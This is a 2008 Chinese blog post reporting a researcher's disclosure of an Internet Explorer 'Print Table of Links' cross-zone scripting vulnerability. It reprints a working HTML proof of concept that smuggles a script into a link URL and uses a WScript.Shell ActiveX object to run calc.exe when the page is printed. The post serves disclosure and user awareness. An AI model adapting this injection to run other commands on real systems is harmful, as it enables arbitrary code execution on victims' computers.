登录  
 加关注
查看详情
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

梦想之鹰的天空

天高任鸟飞......放飞....心情..........放飞.....梦想

 
 
 

日志

 
 

研究人员公布IE 0day 可执行任意代码  

2008-05-22 16:23:10|  分类: 桌面应用 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

传得沸沸扬扬的IE 0day终于在昨天晚些时候由安全研究人员Aviv Raff公布,在Aviv搞的纪念以色列独立日的活动中,Aviv公布了IE 0day的相关细节。(http://hi.baidu.com/secway/blog/item/f21ad28b6bd86c7a9e2fb454.html)。

  这个漏洞是由于微软IE浏览器启动“Print Table of Links”时引起的跨站攻击(Cross-Zone Scripting )

  源文出自:http://aviv.raffon.net/2008/05/14/InternetExplorerQuotPrintTableOfLinksquotCrossZoneScriptingVulnerability.aspx

  如果启用了 "Print Table of Links",在打印一个网页的时候,能够导致执行任意代码。

  1.选择“Print Table of Links”选项

  研究人员公布IE 0day 可执行任意代码 - 梦想之鹰 - 梦想之鹰的天空

  2.把保存以下代码为HTML格式,用IE打开,并打印,会执行calc.exe。 (也可以直接访问http://raffon.net/research/ms/ie/print/linksrce.html)

<html>

<body>

Print me with table of links to execute calc.exe

<a href="http://www.bla.com?x=b<script defer >var x=new ActiveXObject('WScript.Shell');x.Run('calc.exe');</script>a.c<u>o</u>m"></a>

<script>window.print();</script>

</body>

</html>

  专家指出,此类攻击对于习惯对网页进行本地保存的用户,可以触发ActiveX控件发动定向攻击,因此用户仍需警惕。

  评论这张
 
阅读(472)| 评论(0)

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018